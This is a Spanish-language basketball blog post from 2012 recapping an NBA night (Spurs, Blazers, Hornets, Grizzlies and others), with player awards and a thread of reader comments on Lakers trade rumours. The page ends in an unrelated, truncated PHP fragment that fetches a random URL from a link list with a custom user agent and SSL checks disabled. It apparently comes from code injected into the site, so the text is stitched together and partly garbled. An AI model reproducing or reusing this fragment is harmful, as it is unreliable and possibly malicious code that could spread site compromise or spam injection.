La Crónica: Antes hablamos…

22 de February de 2012 por TheDeerHunter

Se rompió la racha de 11 victorias de los Spurs. No hay nada mejor que la rigurosidad de este calendario para mostrar la cara y la cruz de los equipos. Sin Parker, Duncan, ni Ginobili (todos descansando por decisión técnica) se podía intuir el resultado. El lado positivo fue seguir las evoluciones de Kawhi Leonard el negativo fue hacer de los Blazers de McMillan una especie de versión metamorfoseada del dream team original mezclado con el Brasil de Pelé, Tostao y Ribelino (97-137). No les sirve para volver a plaza de playoffs.

Además del hecho insólito de que los Blazers anoten 137 en una sentada, vimos un interesante choque resuelto en prórroga entre Indiana y NOLA (108-117). Digna resistencia de los Hornets, que dieron todo lo que tenían de forma digna, sobretodo el mejicano Gustavo Ayón que anotó 6 de los últimos 8 puntos de su equipo en el tiempo regular. Fue más demérito de los Pacers que se llegara a donde se llegó. Partido colosal de Roy Hibbert. Ojo a la equipación bicolor de los Hornets.

Completísima actuación de Marc ante los Sixers, que atraviesan una mini-crisis (76-89). Aunque no lo diga el Marca lo tuvo más fácil frente a Lavoy Allen y Nocioni que si hubiera sido ante Brand y Hawes. Memphis se pone en un meritorio 19-15 a la espera de la evolución de Zach.

También de mérito fue el partido de Sacramento en Miami, aunque no sirviera para sacar nada. Buena pinta la de la tríada Isiah Thomas, Tyreke y Thornton, pero Cousins no tuvo el día. Tampoco es que los Heat sudaran demasiado porque LeBron estuvo inusualmente relajado. La tercera pata del Big Three casi lo fue Chalmers anoche (108-120).

Finalmente, precioso choque entre los Pistons y los Cavs y entre sus bases rookies Knight vs Irving. Entre este último y Alonzo Gee anotaron 30 puntos de los 35 de su equipo en el último cuarto (100-101).

PREMIOS

MVP: Gran partido de Dwyane Wade al que tenemos un poco olvidado esta campaña. 30 puntos (11 de 16), 10 asistencias, 3 robos y 2 tapones. Otro que llegó a los 30 puntos fue Roy Hibbert que los adornó con 13 rebotes y 3 tapones. Marc Gasol no llegó a 30 puntos pero consiguió 15 más14 rebotes, 7 asistencias, 1 robo y 5 tapones.

Rookie: Duelo de bases en el Pistons-Cavs. Brandon Knight se fue a los 24 puntos (8 de 12), 5 rebotes y 3 asistencias pero Kyrie Irving se llevó el gato al agua con 25 puntos (17 en el último cuarto), 5 rebotes y 8 asistencias. En Miami, Isiah Thomas fue de lo mejor de su equipo con 24 puntos y 5 asistencias. Por su parte, Kawhi Leonard lo hizo tan bien en la derrota de su equipo que se lleva nuestro premio de ‘esfuerzo en vano’.

Sorpresa: Gran actuación de Alonzo Gee que poco a poco ha ido robando protagonismo a Casspi. Anoche fueron 16 puntos, 11 rebotes y 2 robos. En los Sixers, Lavoy Allen sigue saliendo de titular y sigue cumpliendo como demuestran sus 14 puntos, 5 rebotes y 2 tapones de anoche.

Decepción: Los Sixers solo fueron capaces de anotar 10 puntos en un primer cuarto que acabaron 20 abajo. Las malas actuciones de Louis Williams (2 de 13) y Thaddeus Young (3 de 11) tuvieron buena parte de culpa.

Esfuerzo en vano: Las estrellas de los Spurs descansaron y eso dio más minutos y protagonismo a los secundarios. El que mejor lo aprovechó fue Kawhi Leonard que cuajó una actuación muy completa: 24 puntos, 10 rebotes y 5 robos.

Imágenes | AP Photos / Getty Images

Comenta

63 comentarios a esta entrada

  1. Esteban dice:
    #1

    cuando parecia que el GM de los lakers estaba con un pie afuera de la franquicia, sale con esto, michael beasley por la exepcion de odom, wow que ha maquillado su error, beasley es un jugador sumamente parecido a odom con 10 años menos, podra hacer el papel que lamar cumplia en los lakers, jugar desde el banco de alero, y de ala pivot de a ratos con bynum y de a ratos con pau,

    para mi beasley es un fracaso como jugador importante que quisieron hacer creer que es, como tambien lo era odom en los clippers, el heat y algo mejor hasta la llegada de pau a los lakers, pero al igual que beasley lo veo muy bien saltando de la banca en los lakers, puede jugar buenos minutos de 3, aunque no esta para titular, pero traeria anotacion en esa posicion, y respaldado por bynun o gasol, puede dar grandes minutos de 4, sobretodo por q cuando sales de la banca y anotas, las demas deficiencias (defensa sobretodo) no es tan minusionamente mirado, sino que lo diga MO WILLIAMS jugando de bnase y escolta desde el banco de los clippers

    de la exepcion de odom, sobrarian casi 3 millones, lo que sobra puede usarse en otro trade no es cierto? esos 3 millones, mas dinero y/o ronda, o mas goudelock o morris, podrian fichar el base que falta en LA, alcazaria para sessions, ridnur, o alguno que se les ocurra
    con cualquiera de los dos mas beasley, los lakers tienen otra cara…

      Citar

  2. Sancho88 dice:
    #2

    Bueno, a ver si materializan de una vez por todas algún traspaso, sea Beasley o quien sea, porque están viciando el ambiente del equipo. Lo que le están haciendo a Pau no tiene nombre, dan ganas de vomitar. Si llegase finalmente Beasley, sería al menos una amenaza exterior para ayudar desde el banquillo, como bien dices Esteban, era un poco lo que aportaba Odom, aunque también ejercía de base organizador y de pívot reboteador, xd. Pero bueno, irían tapando carencias, que no es poco después de la temporadita que llevan. Me parece un traspaso bastante aceptable. Una C+, xd

      Citar

  3. Denise dice:
    #3

    No se si alguien lo habrá comentado por aqui ya, porque no me he leido los ultimos comentarios, pero sobre mi pregunta de si habia alguien que haya jugado en Lakers, Celtics, Bulls y Knicks; he encontrado a uno que fue drafteado por uno de esos 4 equipos en el que nunca llegó a jugar, y posteriormente jugó en los restantes tres equipos. Incluso llegó a ganar un anillo!!

    Si nadie lo ha comentado todavía, pues dejo la incognita para cuando me toque algun dia hacer la pregunta del trivial.

      Citar

  4. Denise dice:
    #4

    Tachán!! Ya he encontrado a uno que si jugó en las 4 franquicias!!. Y precisamente no es un paquete…

      Citar

  5. Denise dice:
    #5

    Bueno acabo de repasar los comentarios y al primero que me refería (drafteado por uno y jugando en los otros 3) era Travis Knight que ya había sido mencionado por Magicjohnson.

    Pero como digo, ya he encontrado a uno que si jugó en los cuatro equipos. El Google es la caña.

      Citar

  6. Denise dice:
    #6

    Pero como digo, ya he encontrado a uno que si jugó en los cuatro equipos. El Google es la caña.

    Uff, y un buen palmares que tiene el hombre..

      Citar

  7. Esteban dice:
    #7

    Sancho88:
    Bueno, a ver si materializan de una vez por todas algún traspaso, sea Beasley o quien sea, porque están viciando el ambiente del equipo. Lo que le están haciendo a Pau no tiene nombre, dan ganas de vomitar. Si llegase finalmente Beasley, sería al menos una amenaza exterior para ayudar desde el banquillo, como bien dices Esteban, era un poco lo que aportaba Odom, aunque también ejercía de base organizador y de pívot reboteador, xd. Pero bueno, irían tapando carencias, que no es poco después de la temporadita que llevan. Me parece un traspaso bastante aceptable. Una C+, xd

    es verdad sancho lo que dices, odom era mucho mas completo que beasley, pero tiene casi 10 años mas, seria un paso para rejuvenecer el roster tambien…

    AHORA, PARA USTEDES ESPAÑOLES FANAS DE LOS TIMBERWOLVES, SI INVOLUCRAN EN EL TRADE A ALGUN JUGADOR MAS PARA HACERSE DE LA EXCEPCION COMPLETA, QUEDARIAN EN 45 MILLONES, ALGO MAS DE 10 MILLONES LIBRES EN EL TOPE, PARA FICHAR A… POR EJEMPLO, WILSON CHANDLER…

    YO ME LO PENSARIA…

      Citar

  8. MagicJohnson32 dice:
    #8

    Denise:
    Tachán!! Ya he encontrado a uno que si jugó en las 4 franquicias!!. Y precisamente no es un paquete…

    ¿Ah sí? Pues chico, no caigo…

      Citar

  9. MagicJohnson32 dice:
    #9

    Oficial: Rondo al All Star Game.

    Y también oficial, y grandísima noticia para el espectáculo: ¡¡Kevin Durant al concurso de triples!!

      Citar

  10. Esteban dice:
    #10

    wow kaman parece decidido a convencer a un equipo aspirante a q se le lo lloeve y le den un gran contrato
    para este ultimo año me suena mucho mucho dallas, el base frances, mas algunos de los pivots inservibles, los clasicos 3 millones mas rondas y VENDIDO

      Citar

  11. Sancho88 dice:
    #11

    Por cierto, precioso el Mavs-Lakers. A ver si toca revancha angelina o reivindicación de Nowitzki. Últimos 5 minutos, y yo no sabría a quién dar favorito, la verdad. Más igualdad imposible

      Citar

  12. Nacho dice:
    #12

    Partidazo en Dallas. Mereció la pena, la madrugada. Partidazo de Pau, y ¡ojo! a Kobe los últimos minutos, después de cagarla en dos o tres intentos, decidió que si el partido lo ganaban sus dos 7 pies, no pasaba nada. Y qué lujo de dos asistencias para que Pau y Bynum cerraran el partido. Por cierto seis libres seguidos fallados por los de púrpura pusieron emoción al partido. Barnes, Kobe y Pau, dos cada uno. Afortunadamente no los echaron de menos.

      Citar

  13. Sancho88 dice:
    #13

    Hombre, un par de asistencias sí que dio, el resto fueron mandarinas de las suyas que el propio Pau y Bynum pudieron coger al rebote, xd

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>